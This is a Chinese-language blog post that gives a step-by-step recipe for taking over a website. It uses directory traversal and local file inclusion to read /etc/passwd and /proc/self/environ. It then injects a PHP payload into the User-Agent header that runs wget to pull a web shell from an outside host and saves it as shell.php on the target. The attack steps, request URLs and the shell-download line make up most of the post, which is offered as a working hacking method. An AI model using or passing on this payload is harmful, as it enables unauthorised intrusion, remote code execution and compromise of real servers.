通过注入的恶意代码获取网站权限

最新推荐文章于 2021-09-04 15:44:49 发布
最新推荐文章于 2021-09-04 15:44:49 发布
阅读量775 收藏 1
点赞数
文章标签: server traversal firefox shell include freebsd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cisco3101523/article/details/5776507
版权

一、查找本地漏洞  

找到一个可能存在本地包含的文件去check它。  
例如:     www.website.com/view.php?page=contact.php  
替换成   www.website.com/view.php?page=../  
我们得到一个错误  
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337  
翻译下以上的错误信息如下:  
警告:包括(../) [function.include]:未能打开流:没有那个文件或目录在/ home / sirgod / public_html / website.com /view.php  

说明机会很大,只是不存在文件而已  

那么我们就针对服务器存在的文件做检查,比如linux里的/etc/passwd  
提交url:www.website.com/view.php?page=../../etc/passwd  
依旧是:  
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337  
所以我们一层层的加上../测试,直到显示为止  
www.website.com/view.php?page=../../../../../etc/passwd  
这个时候我们成功的包含了/etc/passwd  
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin  

二、检查proc/self/environ是否可用访问  


提交url:www.website.com/view.php?page=../../../../../proc/self/environ  

如果看到类似如下信息:  

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=  
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80  
说明是可以访问的,如果返回时个空白页,说明是无法访问的,也可能操作系统是FreeBSD  

三、注入恶意代码  

我们可以注入我们的代码在用户代理HTTP头。  
使用篡改数据用于Firefox的插件改变Firefox的User-Agent.Start篡改数据和请求URL:  
      
      www.website.com/view.php?page=../../../../../proc/self/environ  
        
     选择User-Agent 写代码如下:  
      
    <?system(’wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>  
          
    然后提交请求。  
      
     我们的命令将被执行(将下载http://hack-bay.com/Shells/gny.txt,并将其保存为它在shell.php  
网站目录),我们的shell也就被创建,.如果不行,尝试使用exec(),因为系统可能被禁用的从php.ini网络服务器.  

第四步:访问我们的shell  
在存在包含文件的目录下访问你注入进去的shell即可  

www.website.com/shell.php  

现在我们的shell是成功的注入进去了  

看到这里想不想知道咋回事那?其原理是利用/proc/self/environ目录遍历及远程执行代码的漏洞,哈哈!!提示下google搜索"Directory Traversal & Remote Code Execution Using /proc/self/environ"吧

cisco3101523
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ARP欺骗病毒,网页“篡改”,注入iframe代码!
weixin_34123613的博客
08-29 181
---------------权威资料看这里---------------清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf---------------民间资料看这里---------------网 ...
网站安全之注入攻击
l664938026的博客
01-06 4536
注入攻击主要有两种形式,sql注入攻击和os注入攻击
局域网下的html注入及DNS劫持
weixin_30555125的博客
12-13 228
之前研究Dsploit的部分功能实现原理,现在了解的差不多了,简要记录下Dsploit的断网攻击,html注入,图片替换,cookie劫持的原理。本篇blog需要有一定的网络知识基础在看。 假设现有三台主机,A代表网关,B代表攻击者,C代表受害者。A,B,C的ip分别为192.168.1.1 192.168.1.2 192.168.1.3 B使用Nmap扫描当前网段下的...
文件包含漏洞一览
Amire0x的小乐园
11-08 485
文件包含 原因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 php的文件包含相关函数都是无论其参数的扩展名是什么,都会将其内 容作为php代码解析,这可能就会造成任意的php代码执行。 如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就 很可能使攻击者利用该功能进行文件包含漏洞的攻击。 相关函数 引起该漏洞的通常是 include() include() 如果出错的话,只会提出警告,会继续执行后
【常见Web应用安全问题】---4、Directory traversal
weixin_34331102的博客
12-22 333
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、跨站脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
解析:清除SQL被注入恶意病毒代码的语句
09-10
SQL注入是一种常见的网络安全问题,它发生在攻击者通过输入恶意的SQL代码来操纵数据库系统获取、修改、删除敏感数据或者执行非授权操作。本文将深入探讨如何使用SQL语句来清除已被注入的恶意病毒代码。 首先,...
PHP实现清除wordpress里恶意代码
10-23
恶意代码的主要目的包括但不限于获取网站后台权限、盗取用户数据、发起DDoS攻击等。 知识点二:恶意代码的一般特征 恶意代码通常包含一些不常见的字符串和模式,比如混淆的函数名称、特殊的HTTP头部值(User-Agent...
汇编代码注入器,支持x64和x86
最新发布
04-04
在x86架构下,代码注入通常通过以下步骤实现: 1. 获取目标进程的句柄:使用Windows API函数如OpenProcess获取目标进程的访问权限。 2. 分配内存:使用VirtualAllocEx在目标进程中分配一块内存,用于存放注入的汇编...
C#防SQL注入代码的三种方法
09-04
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL代码来操纵数据库,获取、修改、删除敏感信息,甚至完全控制服务器。在C#中,防止SQL注入主要有以下三种方法: 1. **避免直接拼接SQL语句** 直接...
x86,x64 汇编代码注入器 C,C++写的
04-15
2. **获取进程内存权限**:为了能够在目标进程中写入代码,注入器必须获取足够的访问权限。这通常通过Windows API函数如`OpenProcess`来完成。 3. **分配内存**:在目标进程中分配一块内存供注入代码使用。`...
python和django的目录遍历漏洞
weixin_38023368的博客
09-04 426
攻击者通过请求 http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 或类似URL,可跨目录读取系统敏感文件。 显然,这个漏洞是因为WebServer处理URL不当引入的。 我们感兴趣的是,这到底是不是一个通用WebServer的漏洞。 经分析验证,我们初步得出,这主要是由于开发人员在python代码中不安全地使用open函数引起,而且低版本的django自身也存在漏洞。 1
利用输入框进行恶意代码注入
潜行
06-16 1657
http://www.freebuf.com/articles/4316.html
渗透测试公司之实战SQL注入拿下网站权限
网站安全资讯
12-08 2329
近来,利用sql注入、xss和文件上传漏洞,成功getshell的一个客户网站(必须要拿到客户授权渗透测试许可证明才可以,不得违法入侵),这里简单记录一下整个过程,与...
网站权限控制
Idwins
05-08 1203
传统角色为:RBAC 基于角色的权限访问控制; 复杂多层次可用OB4LAC(人员–&gt;岗位–&gt;角色–&gt;权限); 一、配置 数据库配置 菜单表、角色表、角色菜单关联表、用户角色关联表、(用户岗位关联表) 菜单表可根据实际情况配置到具体的(新增、修改、删除、详情等二级页面)。 也可根据实际需求增加 按钮配置表、菜单按钮关联表进行控制。 二、控制 管理员通过页面实现角色(岗...
注入,动态生成及混淆的恶意代码的检测
Juliet
04-03 390
DOME(Detection of Maliciious Executables) 它是一种检测宿主可执行文件中的恶意代码的技术。DOME通过表态分析确定软件中产生系统调用的位置(虚拟地址),然后再监视软件运行并难所有观察到的系统调用都是从静态分析时获得的地址处产生的。这种技术简单,易行,实用,而且对注入,动态生成以及混淆的恶意代码都非常有效。   1. 注入式的代码 - 运行期间注入某个进程地址...
利用SQL注入获取服务器最高权限
weixin_33730836的博客
11-01 2189
单位有台数据库服务器(windows 2000 操作系统,sql server 2000)前段时间莫名其妙的被***了跑到机房,通过PE进去一看,发现多了一个账户(SQLDEBUG)。并且administrator账户被禁用了看看数据没少,也没太在意。利用PE把账户破解了一下,就回单位了今晚回来刚好要去数据库服务器上,下个数据库备份文件。结果发现密码又登陆不了。不祥预感出来...
PHP代码注入系统命令注入知识点总结
* 输入验证:对用户输入的数据进行严格的验证,防止恶意代码注入。 * 输出编码:对输出的数据进行编码,防止恶意代码执行。 * 减少权限:减少Web应用的权限,防止攻击者获得高权限。 * 使用白名单:使用白名单来限制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值